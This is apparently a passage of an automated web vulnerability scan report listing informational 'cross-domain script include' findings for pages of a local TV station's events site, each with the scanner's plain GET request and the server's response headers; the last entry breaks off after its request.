<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.181. http://events.cbs6albany.com/clifton-park-ny/events/show/164348085-bring-me-the-horizon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/clifton-park-ny/events/show/164348085-bring-me-the-horizon

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /clifton-park-ny/events/show/164348085-bring-me-the-horizon HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:45:39 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 142
ETag: "e107b0d5c2345a2676e407a1a48662f7"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:45:39 GMT; HttpOnly
Content-Length: 44598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.182. http://events.cbs6albany.com/clifton-park-ny/venues/show/11456-northern-lights previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/clifton-park-ny/venues/show/11456-northern-lights

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /clifton-park-ny/venues/show/11456-northern-lights HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:46:43 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 95
ETag: "7fca35bd43ff833b123c97ee72367ebe"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:46:43 GMT; HttpOnly
Content-Length: 53686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.183. http://events.cbs6albany.com/glens-falls-ny/events/show/164377145-tna-wrestling-live previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/glens-falls-ny/events/show/164377145-tna-wrestling-live

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /glens-falls-ny/events/show/164377145-tna-wrestling-live HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:47:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 121
ETag: "f1bbe642a45c56f858eefe9227d076d3"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:47:13 GMT; HttpOnly
Content-Length: 46066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.184. http://events.cbs6albany.com/glens-falls-ny/venues/show/185044-glens-falls-civic-center previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/glens-falls-ny/venues/show/185044-glens-falls-civic-center

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /glens-falls-ny/venues/show/185044-glens-falls-civic-center HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:47:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 85
ETag: "ed30ecb6059f5d05bc4f5fc8e9a3d47b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:47:13 GMT; HttpOnly
Content-Length: 59946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.185. http://events.cbs6albany.com/menands-ny/events/show/163979825-sweetheart-breakfast previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/menands-ny/events/show/163979825-sweetheart-breakfast

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /menands-ny/events/show/163979825-sweetheart-breakfast HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:47:29 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 178
ETag: "af94f516d7c06edb567439cabe37de79"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:47:29 GMT; HttpOnly
Content-Length: 37424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.186. http://events.cbs6albany.com/movies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /movies HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:56 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 23
ETag: "4ef5810659546a41c2a2ffc993f50066"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:48:56 GMT; HttpOnly
Content-Length: 32331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.187. http://events.cbs6albany.com/movies/show/261885-127-hours previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/261885-127-hours

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /movies/show/261885-127-hours HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
